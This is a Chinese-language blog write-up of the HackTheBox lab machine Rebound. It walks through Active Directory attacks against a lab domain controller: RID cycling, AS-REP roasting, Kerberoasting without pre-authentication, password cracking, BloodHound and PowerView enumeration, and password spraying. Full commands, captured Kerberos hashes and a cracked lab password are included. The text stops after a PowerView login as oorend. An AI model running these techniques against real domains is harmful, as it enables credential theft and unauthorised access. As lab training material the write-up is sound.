HackTheBox Rebound [RID cycling + AS-REP-Roasting with Kerberoasting + Weak ACLs + ShadowCredentials attack + cross-session relay + Runascs and KrbRelay read gMSA password + Resource-Based Constrained Delegation (RBCD) + S4U2Self & S4U2Proxy]

Posted on Edited on In , , , , , , , Views: Word count in article: 5.9k Reading time ≈ 22 mins.

简述

本文是Insane难度的HTB Rebound机器的域渗透部分,其中RID cycling + AS-REP-Roasting with Kerberoasting + Weak ACLs + ShadowCredentials attack + cross-session relay + Runascs and KrbRelay read gMSA password + Resource-Based Constrained Delegation (RBCD) + S4U2Self & S4U2Proxy等域渗透提权细节是此box的特色,主要参考0xdf’s blog rebound walkthroughHTB的rebound官方writeup paper记录这篇博客加深记忆和理解,及供后续做深入研究查阅,备忘。

信息收集

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
nmap -p- --min-rate 10000 10.10.11.231

PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49671/tcp open  unknown
49674/tcp open  unknown
49675/tcp open  unknown
49676/tcp open  unknown
49681/tcp open  unknown
49688/tcp open  unknown
49724/tcp open  unknown
55738/tcp open  unknown

nmap -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389 -sCV 10.10.11.231

PORT     STATE SERVICE       VERSION
53/tcp   open  domain?
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-03-17 23:09:17Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.rebound.htb
| Not valid before: 2023-08-25T22:48:10
|_Not valid after:  2024-08-24T22:48:10
|_ssl-date: 2024-03-17T23:11:51+00:00; -1s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.rebound.htb
| Not valid before: 2023-08-25T22:48:10
|_Not valid after:  2024-08-24T22:48:10
|_ssl-date: 2024-03-17T23:11:50+00:00; -2s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.rebound.htb
| Not valid before: 2023-08-25T22:48:10
|_Not valid after:  2024-08-24T22:48:10
|_ssl-date: 2024-03-17T23:11:51+00:00; -1s from scanner time.
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.rebound.htb
| Not valid before: 2023-08-25T22:48:10
|_Not valid after:  2024-08-24T22:48:10
|_ssl-date: 2024-03-17T23:11:50+00:00; -2s from scanner time.
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open  mc-nmf        .NET Message Framing
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=3/17%Time=65F77824%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

开放389,636 ldap端口,很明显是一个windows域控

RID cycling

首先尝试smb列出共享

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌─[root@kali] - [~/hackthebox/machine/rebound] - [2540]
└─[$] smbclient -L \\\\10.10.11.231\\                                                                                                                [20:23:17]
Password for [WORKGROUP\root]: anonymous

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        Shared          Disk
        SYSVOL          Disk      Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.231 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

只有Shared共享可用——尽管它是空的。考虑到可以匿名登录,尝试通过Impacket的lookupsid.py枚举用户,它使用暴力查找现有用户的安全标识符(SID)。它通过循环遍历相对标识符(rid)来实现这一点,rid与域的SID连接以形成整个SID。根据参考文档:

对于域帐户,通过将域的SID与帐户的相对标识符(RID)连接来创建安全主体的SID。

运行impacket-lookupsid,在目标IP地址前加上任意的用户名:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
┌─[root@kali] - [~/hackthebox/machine/rebound] - [2541]
└─[$] impacket-lookupsid nan@10.10.11.231 -no-pass                                                                                                   [20:24:28]
Impacket for Exegol - v0.10.1.dev1+20240403.124027.3e5f85b - Copyright 2022 Fortra - forked by ThePorgs

[*] Brute forcing SIDs at 10.10.11.231
[*] StringBinding ncacn_np:10.10.11.231[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4078382237-1492182817-2568127209
498: rebound\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: rebound\Administrator (SidTypeUser)
501: rebound\Guest (SidTypeUser)
502: rebound\krbtgt (SidTypeUser)
512: rebound\Domain Admins (SidTypeGroup)
513: rebound\Domain Users (SidTypeGroup)
514: rebound\Domain Guests (SidTypeGroup)
515: rebound\Domain Computers (SidTypeGroup)
516: rebound\Domain Controllers (SidTypeGroup)
517: rebound\Cert Publishers (SidTypeAlias)
518: rebound\Schema Admins (SidTypeGroup)
519: rebound\Enterprise Admins (SidTypeGroup)
520: rebound\Group Policy Creator Owners (SidTypeGroup)
521: rebound\Read-only Domain Controllers (SidTypeGroup)
522: rebound\Cloneable Domain Controllers (SidTypeGroup)
525: rebound\Protected Users (SidTypeGroup)
526: rebound\Key Admins (SidTypeGroup)
527: rebound\Enterprise Key Admins (SidTypeGroup)
553: rebound\RAS and IAS Servers (SidTypeAlias)
571: rebound\Allowed RODC Password Replication Group (SidTypeAlias)
572: rebound\Denied RODC Password Replication Group (SidTypeAlias)
1000: rebound\DC01$ (SidTypeUser)
1101: rebound\DnsAdmins (SidTypeAlias)
1102: rebound\DnsUpdateProxy (SidTypeGroup)
1951: rebound\ppaul (SidTypeUser)
2952: rebound\llune (SidTypeUser)
3382: rebound\fflock (SidTypeUser)

返回少量用户,因为在默认情况下,impacket-lookupsid将RID的最大值设置为4000。将这个限制增加到10000,并再次运行这个工具:

现在看到rid最多为7687的用户,这提供了大量的用户名样本。将所有的SidTypeUser条目保存到一个文件中,以供以后使用。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
impacket-lookupsid nan@10.10.11.231 10000 -no-pass | grep 'SidTypeUser' | sed 's/.*\\\(.*\) (SidTypeUser)/\1/' > usernames.txt

┌─[root@kali] - [~/hackthebox/machine/rebound] - [2542]
└─[$] cat usernames.txt                                                                                                                              [20:32:18]
Administrator
Guest
krbtgt
DC01$
ppaul
llune
fflock
jjones
mmalone
nnoon
ldap_monitor
oorend
winrm_svc
batch_runner
tbrady
delegator$

AS-REP-Roasting with Kerberoasting

现在尝试识别易受AS-REP-roasting攻击的用户。在配置帐户时不要求Kerberos预身份验证,从而允许攻击者为这些用户请求加密的票据授予票据(tgt),而不需要用户的密码,就会出现此漏洞。

Impacket的GetNPUsers.py工具可以为具有UF_DONT_REQUIRE_PREAUTH属性的用户检索票授予票(tgt)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌─[root@kali] - [~/hackthebox/machine/rebound] - [2543]
└─[$] impacket-GetNPUsers -usersfile usernames.txt rebound.htb/ -dc-ip 10.10.11.231                                                                  [20:34:38]
Impacket for Exegol - v0.10.1.dev1+20240403.124027.3e5f85b - Copyright 2022 Fortra - forked by ThePorgs

[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User DC01$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ppaul doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User llune doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User fflock doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$jjones@REBOUND.HTB:95d51957aa3771dacc1664c6236c4055$d434f84d1d47433e95073960ed2980c385ae8f830686ef69bc2c0d9b23e197a2901986f89105ff750b722e9cb7086ad9d13c924e41e182cc4e8e0e646838397aa50e33c6356b24f860b4791cdaec04d57bc3f2734ab7749e42073aadfb097ea24a55dd4ae56f68d7f8cba78d1cdb8dcbeedb63f6c11dd6a813d6729a8c76666d9ff687a06b84fb1e6abdb4b92c9b372f44f0c8682f3f36dec2118efa0b81952041c2d180a8ebe0c77d47ea5da4344d1897d1f5b3b92e1618a39ebb94c0e55c457f84d5952f226890e2b1091dc656eb1e1ff16cbf4bb5a288683ea55e64c9491212260953e3574dfd0b9b
[-] User mmalone doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User nnoon doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ldap_monitor doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User oorend doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User winrm_svc doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User batch_runner doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User tbrady doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User delegator$ doesn't have UF_DONT_REQUIRE_PREAUTH set

jjones返回一个加密的TGT。不幸的是,它似乎无法破解

最近的New Attack Paths? AS Requested Service Tickets表明,可以利用AS-REP-roastable用户来执行Kerberoasting,而无需预身份验证:

但是,对于Kerberoasting,不需要访问会话密钥。只需要生成的ST,或者更准确地说,不使用请求帐户密钥保护的ST的加密部分。因此,如果将任何帐户配置为不需要预身份验证,则可以在没有任何凭据的情况下进行Kerberoast。

对这种攻击的支持是在Support for Kerberoasting without pre-authentication and ST request through AS-REQ #1413中提交的,并且已经合并到当前的Impacket主分支中,但在本文时还没有作为正式版本推出。因此,将使用一个支持这种攻击的impacket github分支,以及本文后面需要的其他一些攻击操作。所有与impack相关的命令都将使用此版本的工具执行。

1
2
3
4
5
python3 -m venv impacket-fork
source ./impacket-fork/bin/activate
git clone https://github.com/ThePorgs/impacket.git
cd impacket
python3 setup.py install

现在,可以使用GetUserSPNs.py的-no-preauth选项来请求票据授予服务(Ticket Granting Service, TGS)票据,使用jjones的加密TGT

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
(impacket-fork) [root@kali ~ ]$ GetUserSPNs.py -no-preauth jjones -request -usersfile /root/hackthebox/machine/rebound/usernames.txt rebound.htb/ -dc-ip 10.10.11.231
/root/impacket-fork/bin/GetUserSPNs.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  __import__('pkg_resources').run_script('impacket==0.10.1.dev1+20231106.134307.9aa93730', 'GetUserSPNs.py')
Impacket for Exegol - v0.10.1.dev1+20231106.134307.9aa93730 - Copyright 2022 Fortra - forked by ThePorgs

[-] Principal: Administrator - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: Guest - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
$krb5tgs$18$krbtgt$REBOUND.HTB$*krbtgt*$b7f4495dad8442753f659146$228b6f2a0f7a0b5319fe1c223e915352d84fa0fd83915cfe9d57a41915382f4413af126465af63450eff3f05284915e8dcbf94af88b3888cacdcac941de7981f3aa5246439f4186434e91be539bbefc017b1a6a13b07f996ae068586469ba1b8cfffb1091eeb7ed5480623478bd25e66c26d8893a1eff939d7f475549866856701801e2bdde297cf4030a0131532261136f738dff5d0e77fae4da3c64c9e5589a1a4349b88c7b97b75621350a0e6fe2d191c7b7a52dbc478e9442da0e4008007838cb14695bcc7a98bdb7c68a70fce74d5748fd13d017235cb451326443f100642e6c09570df22795bca436d292b3014e8d10a0c3fbb50911e6b88bb66b2232420d0eaace34f6aaf9847f5e684380de41ae1b70f4a975fa0acf8b2b5dbebff865232a3aba195f72dac905dba0ea55182f10cd6ccda43978273a4fae20b424c4414a2cd6b1e385637759db2a8e832e1d0e4c44207d97c16acad3e20e32b6b46d256023d8641207a419ca9fb23fcb995adfda0394405bb77a8d4d3d8a4ba22ae2370f7fa93b84827e4496537b22170d9f8af84b3c591a1759873114b6d4de1f984e25a2cd70e34a4bc33b956c74185aab15d844dda9f9b391bd0a017d3c836df34b7c9312a943e91dc956d20661fe752b4763dc2ed6a3e5bfb7d09f1546fd04b6d8577bce8781904491428db21c4e7acf83a359187f44b3bccca0e8c40dcef5541f1ffc767156411d96f6cf1746783b893605779d888b5ee1965a16d6304bac92942a95c66823af762bb8572ccb2ac1382f9002f3eb73ba82cafa13a5ee71fbd720ed8f966a03f5bc67201115a3a1c48db47177a9f4b95937191c42d33b14663e4d4c5d5093b523f92bd82d4087805e0c4c40cef24e63a3219d9a220a74dbb127bd29548a3d7c7c51475dd01feda149b79a1c2f0fdd4dfa40f24db7384bca5057dbf75b552b80551fddf73af319ee5afa5f88420e93e8e04247d3829105d00486424971b0b323da8cdbfc0d110ce1773346bfe2a0cd8b045b978848a48ae3b5d448f3baa4efbef9dcf337238211891e148a7f4d329f98f80039a926a25104e0211bfae00a1ba047897d9ad6149ae47031884879271cae4ee75b59fad20a90313ebc3bcf52002a8cca08a33282d809d5b52a5a5a49c7177161b760f3ed0b6178efbea5bd913efd2a941cba7a9458ab179f875a33447693664ce1ee28baa1cd5ea0fe48cb7b13411a953c5f78a9cce432028a67752a4734527898d74db5416390011305a2907fd2e8f5b38b4b647e32280ad835ad19bc5c1dc86f2f39e28ce305839365bc13e02b0b91ce0de3434f17056a3f68d2ebd62ca9bd3ab1a88f49769e75ae1cb38dd42ae74707f9af972bb068562d91ef79d7c335e5fa2b438778b9ab00f297899361591be01b1ebc128b37dff595e8bb1e0f028f9c7632b012d352e81c0b5660c2a6ef0a1a42967b7fae4c1abd09279
$krb5tgs$18$DC01$$REBOUND.HTB$*DC01$*$676eaed2d439c42a6527e613$edbd46f85fd04d663029ae0f38a60b6c4387f102e74f1c6f7afb3bcf7cfaf403315e95c3d44cfe92ad358163b825a5ec208914a3c57de024598f67a0e22c81cc12503d0d3d5c30d0af43fd829bad743551438c0ba471470f87f1d0d9b0f3679f5579698d805d16042bcf109d7eda65e2f7d11f82fb62fef7e437dc9a9f26ea6043475bab07bdc9f6ddd824550085b1fc4dfa5b8751efabf603c8b435f76c598cc492e0d01915068ea6137ada5233bd8446e81878206f757c1562e71ff7821c546a81117a5b7a0af14092f392d652c480236cc0c88a35dbe34ca858c5150756d6d75035265124659f99e107776d976b7b9cc93d1b6deba493c20e7782ce69f12a344b0559ba2a0db7a2febe7da4daa6d90f36f97250ce16191a758ee264a7c16803baafe2f767724c0f7c87525378ab80f7c63fdcf2ea6b27e1a7b7c774597f56efc798443e280621eb7506b12a54ece0cbca159f301767c76d97503b87c9a448d846901cbff3d2d28377b91a979e5349a591f11f23420853cd328b7446d13c60b1eeb701711fbe10cadbc13c6a35f5eed5de082adc6f2d20a4a7843c777a6709747c13bedaa1f3324bfce2f3593b3190c39afcce51426f8a1eff6c773d0100388505cffb856c083ece4f6331d06d1a57124bf220b639ac2c2dda020fc164845f9e53a529c7e135cdcfca76952b7ea35a463a04087f9af87e0fa025e033d3c986736c44dfa2f380b865e0ff970ad40abe53b9c8f1e166a7feea936fa9ff886217e50f8f8b4a55fc01bf26914c419adec47233c47a9bcf851aaf0c1f9c2e345459fe5ab037d6cbe457ff89e215ff91b8777b5e39422c5a884746e3176711897dae50f7ef0ccb6ff68ee602bf12902a2fb498f5e83196f9e1f9b07670c3264c2cd86161190e74563acd4140f2423b40a7436a0660338613796562de436a7a8445d5bdc5916873da5368749e9562317ff6f11e984b785a6dd96033270955599b0cd07cd6056a8ae4ae2a77402066306feed7280f063e7917df669a6abad3dec14ad87251a1145a6c3b3db3d4eb9e889846bc3a8daa27eac9dd0c144f90de20b6c258f47321bf7505bc290d0d4d719ff2438fd3b123dcaaa2be8f57e8d0596a11cc0b4f0e91c2950daf39a4cf712f40f23c9506cee7000b8a3ed18002d79b0abe23c26e3a4ac586f5a9f075f8e7ea41e8d0f3c51aae863c6ecdcbb46442f8283d8c8e9e30dbb975024b1ccf485fa537e970945f9600230b7cc794cdd395efa6c2ebd270f8a60af6aaa4a1c6403dd42286ea15a3d80b7e810628cdb8f75783fecc0493218fc934ae89f0687cac4e09982d8e5716a30c05e67986892448f2528d3dd6291c282e82db4a131924e6
[-] Principal: ppaul - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: llune - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: fflock - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: jjones - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: mmalone - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: nnoon - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
$krb5tgs$23$*ldap_monitor$REBOUND.HTB$ldap_monitor*$20941b976672bf739ab097ba01a8cfae$3a4367ed51eb98246925df381ddaf352c124bead33075606510e7a0a879a6a76ec2bdafc4cc5db9427d4ff5985a646b0bd20f666ab3e174dde613f4a9edd67c3d50631955fc2eb3fd69750a1c4da1642c9100bb187ab841ebe4766366462dd0fea6c8e05b14e862360ee97cd7637f3264ff4f3415eb353431cf8d8aed45afec6a3aaacf1e39dce01ef657213a50da924deca54853452d861fbc108ee0e49ecda8d698941b0d7151b3800149ef9937b668a9e76af6274f5e8c172dddfc916c53dd6e520b7e0edf95ab20729ad7f85ffeb218664f8dfd03a9c5addc226d3aba6ef054d2029c73c39cc3ca0fc895b329a9db84f699ef31b4fed7843749370971bbacc5f829b3721d16d182370ebcb728953d538cca54f908e0d5eb918eaeff7f2e2ee0b770736ccfb9aad2f725374c9057c9b8cb61d6cd262a93d997e1de62fe5c4a6b5c2bf80dd1bc8e4f82725516ab85a78d98fb87fcb7f78d61602f43f9b53c7463d7158d37f482c02178ef798b3b1badb4ae89e95f10363e82b373dd7d108f71c67768ce64a48388023190d0f7e6696946ad17ad5c3f3858081956f4ceae07da4fd80ccf6ef3b611a76fd51cf487fd3125f6c5e8ba9bc9c07f5fa1c1b1118af320d63425fdc28131b61bf1a5a6bc44b99506da168037a00dea3012d23818e1bf91cbe5bf6f4bae50d243d9a1b71a8de4cdace5c6b9557fb1c732b24507c41d1270f15e604fe7d4ca35b362e09bb75f41a8c070d9bc226e19ce50fa03e30f0907e43da8b063d0400fbb73494e010e7458a3d17e1b8cdd71e10d375a739bc47ef68234068caefafb4d932d755cef4f0c15a0883f35655fb552bb8157c54ab991773e6f349239abd8b0465e6a1c3710e34053b83a5e678b6c151162e1898f602579c85493a4561118e13b54245a8f11ac0e4e1515c8e49c3cf808fe3909b82d85b9ed08adf8fd8d7cdbcdd8419df7db382fb83c1b60ac147911cc1e36ec25daa024afa64d4b0b494271750157fc95cbb39bfa0d9f8f82bd2ca72a5b532b93423ed4e18548f622d0b58e75b15f474b13a167fe18a599dd2b85d0089598652b90d7143ed144dc87debf95ed91e9230ec9762649e1b684a3a2933eafc6e05cfa9c1c0beb61cbe0669bcc148dcc484a7b1f07c83c18203360efdc059f81dff14fcc5fea703f9eaaa51a1e7dec1e363d943c14965d14e76928f98c44e4882ecb4f990a6579e9fd031c50df44bc79fd68d79047c94f9eb8e6ccc1c77816d30ee6102309719e376309ad74ed19ca621e686a33277377b71e36d5d2e4163b352c846b5208f7ea97d2fa1f59b5ebbccc4b044c8b3f22b59192040530931ccc63c1607c1c35e04c0
[-] Principal: oorend - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: winrm_svc - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: batch_runner - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: tbrady - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
$krb5tgs$18$delegator$$REBOUND.HTB$*delegator$*$6cab342633ff628cfcfac8c4$71fd68ad65f56c75f181aa22d1e803a739ff8f633f1096e1c59ac72c0cdaff8432bace2027c335b971a24d5f417ee30075f2996b2ae2e48698f9b30c9ba04891cb3ecffaba2f57aad6f6cee7a53aac3c301a6ba5689bae2c54a9ccc7f58d670ecebcac2234d0d22e5cfb48d4adc534fde9822464b980ee548ec9fecd7a42a225679fd2ec52bab1b0af038e2844489f2d2925e1b46dffed03e72fed1efcd84fb40029c17afec70e279209ca1383c9549bcdc80ab1f4aaa33f7665de2cef404ad8c3922bd1fcdd60371c8f0dbc72c65db6a40837cc6fae06c20a1999689788e67ea1a4cc7ec0ebff158090aeb2a8a2aaa64b3c6cf07c3a5dd84356f0733ae208ca4087f16f92306775f427e2fa11d4df609be59b58112177cba564bff5361f973693274529f5dac04139e8208467364d2b87404dc9cdda9daf3bf31eb53484d5afd414a7e3e4340d307079561b03b6bcce1547f4605ca96b5e1599d5681f2779222465ebae5911e3433208d3bc43240f77a3a757e02a7bdcbcf49d265622f85f2e525f902867665828d53768e169b0185548a7ddb7721541f974730b983fdb9b01ccb04561ac86264479c4e55a21cc51a39e36df0aeaa3cd983ecb453e964bc5b645211b6c0658188696a8ebc909999530b582ae8f3efa44924a86c4d705e473196d4edd1617a641f683cd4a7b8ff5436981d7b39d03a8bf189b238256ea7160f28bdb126a47f0dba95883d7c8f8e8e5acbc5562f8a08aa04ec03064b6bb215065f03028003f60782e5898b00f70086ab2a7718e3d382d8ffc73116b7ff2accba494b67bbbf0b7b0d1022ec0a7a00d78280380d208c8032edfd7d0e2bda779a4b4d513d90ac9c3395516bfd6fabe73ef6804d0a07c1bfe75b1a639fd671246ea4447cbeb392178382fee5321a2db0ce5dfabdb4d35e87c23b3668335a68bcaa9d22c45fedc9bc7b15af986196ff8353f618822e1fce7a07b85c38d20a19602a1b12d4bca45b92c671349073c629154aac7884cd7597ab80ccde050d6c349c280f7a9de6da94404b7600b0a55eefb2b132a093bd7574d367bb79e7bea8263a88882de510cf8d0e534678dddc6ab81dff055f1e56a1944f11a5a8a5b2e9ec20342cd1460544f63f1dbb6698dfd40a746828a8beded8056cb50765bb1dcffe8524536747556e2b3cf977aa32852c6579066383408c3917cc325a34d66f0c5f556d937dd7981485193a999fc669c756f4eb6ba354bac985ceb870e647a14e8afd70b1e52ec011ebb6c0f7b1b9e00e9b2f2548d0245185eedc967073c4f7f7b8ebc5c7775d4f1410e81f8999cfde4af7a61094d25d905b6800c7470d7e2324c01053e62cb20d5b10ac090c76d91

该命令成功运行并产生许多票据,包括ldap_monitor和delegator$的票据。做出一个有根据的猜测,DC01、krbtgt和delegate$票证是不可破解的,因此将重点放在ldap_monitor票证上。

将其保存到一个文件中,并将其提供给john:

1
2
3
4
5
┌─[root@kali] - [~/hackthebox/machine/rebound] - [2556]
└─[$] john hash --show                                                                                                                               [20:59:33]
?:1GR8t@$$4u

1 password hash cracked, 0 left

Bloodhound & Powerview

使用bloodhound.py远程枚举目标AD环境。调整集合查询(-c)以排除ObjectProps,因为它似乎会导致工具失败。

Bloodhound的复杂性超出了本文的范围,但可以在HTB的Active Directory Bloodhound模块中获得。

1
bloodhound-python -u ldap_monitor -p '1GR8t@$$4u' -d rebound.htb -dc dc01.rebound.htb --zip -c Group,LocalAdmin,RDP,DCOM,Container,PSRemote,Session,Acl,Trusts,LoggedOn -ns 10.10.11.231

Bloodhound没有透露太多信息,但是,发现ServiceMgmt在Service Users组织单元(OU)上具有GenericAll,这可能导致Descendant Object Takeover (DOT)

然而,首先,需要找到一种方法来成为组的一部分或妥协组中的用户。
使用powerview.py进行进一步的枚举。

这表明LDAP通道绑定设置被设置为”Always”,导致服务器放弃来自不提供令牌的客户端的任何连接。对于想要对LDAP/LDAPS执行的任何查询,也会发生这种情况。

通过-k标志绕过Kerberos身份验证的这个约束。

  • 确保系统时钟与服务器时钟同步,以便Kerberos正常工作:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
┌─[root@kali] - [~/hackthebox/machine/rebound] - [2557]
└─[$] ntpdate rebound.htb                                                                                                                            [20:59:52]
2024-04-06 04:17:13.7079 (-0500) +25202.758727 +/- 0.127430 rebound.htb 10.10.11.231 s1 no-leap
CLOCK: time stepped by 25202.758727
┌─[root@kali] - [~/hackthebox/machine/rebound] - [2558]
└─[$] powerview rebound.htb/ldap_monitor:'1GR8t@$$4u'@dc01.rebound.htb -k                                                                             [4:17:13]
Logging directory is set to /root/.powerview/logs/rebound.htb-dc01.rebound.htb
(LDAPS)-[dc01.rebound.htb]-[rebound\ldap_monitor]
PV > Get-DomainObjectAcl -Identity Servicemgmt
...
ObjectDN                    : CN=ServiceMgmt,CN=Users,DC=rebound,DC=htb
ObjectSID                   : S-1-5-21-4078382237-1492182817-2568127209-7683
ACEType                     : ACCESS_ALLOWED_ACE
ACEFlags                    : None
ActiveDirectoryRights       : Self
AccessMask                  : 0x8
InheritanceType             : None
SecurityIdentifier          : oorend (S-1-5-21-4078382237-1492182817-2568127209-7682)
...

通过Self权限,orend可以将自己添加到组中。虽然目前没有这个用户的任何凭据,但是可以通过netexec喷射ldap_monitor的密码,希望能找到匹配的。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
pipx install git+https://github.com/Pennyw0rth/NetExec

λ ~/hackthebox/machine/rebound/ netexec smb dc01.rebound.htb -u usernames.txt -p '1GR8t@$$4u' --continue-on-success
SMB         10.10.11.231    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.231    445    DC01             [-] rebound.htb\Administrator:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB         10.10.11.231    445    DC01             [-] rebound.htb\Guest:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB         10.10.11.231    445    DC01             [-] rebound.htb\krbtgt:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB         10.10.11.231    445    DC01             [-] rebound.htb\DC01$:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB         10.10.11.231    445    DC01             [-] rebound.htb\ppaul:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB         10.10.11.231    445    DC01             [-] rebound.htb\llune:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB         10.10.11.231    445    DC01             [-] rebound.htb\fflock:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB         10.10.11.231    445    DC01             [-] rebound.htb\jjones:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB         10.10.11.231    445    DC01             [-] rebound.htb\mmalone:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB         10.10.11.231    445    DC01             [-] rebound.htb\nnoon:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB         10.10.11.231    445    DC01             [+] rebound.htb\ldap_monitor:1GR8t@$$4u
SMB         10.10.11.231    445    DC01             [+] rebound.htb\oorend:1GR8t@$$4u
SMB         10.10.11.231    445    DC01             [-] rebound.htb\winrm_svc:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB         10.10.11.231    445    DC01             [-] rebound.htb\batch_runner:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB         10.10.11.231    445    DC01             [-] rebound.htb\tbrady:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB         10.10.11.231    445    DC01             [-] rebound.htb\delegator$:1GR8t@$$4u STATUS_LOGON_FAILURE

找到了oorend用户,这意味着现在可以将自己添加到组中。

回到powerview,这次是oorend。

1
2
3
4
5
6
┌─[root@kali] - [~/hackthebox/machine/rebound] - [2559]
└─[$] powerview rebound.htb/oorend:'1GR8t@$$4u'@dc01.rebound.htb -k                                                                                   [4:24:53]
Logging directory is set to /root/.powerview/logs/rebound.htb-dc01.rebound.htb
(LDAPS)-[dc01.rebound.htb]-[rebound\oorend]
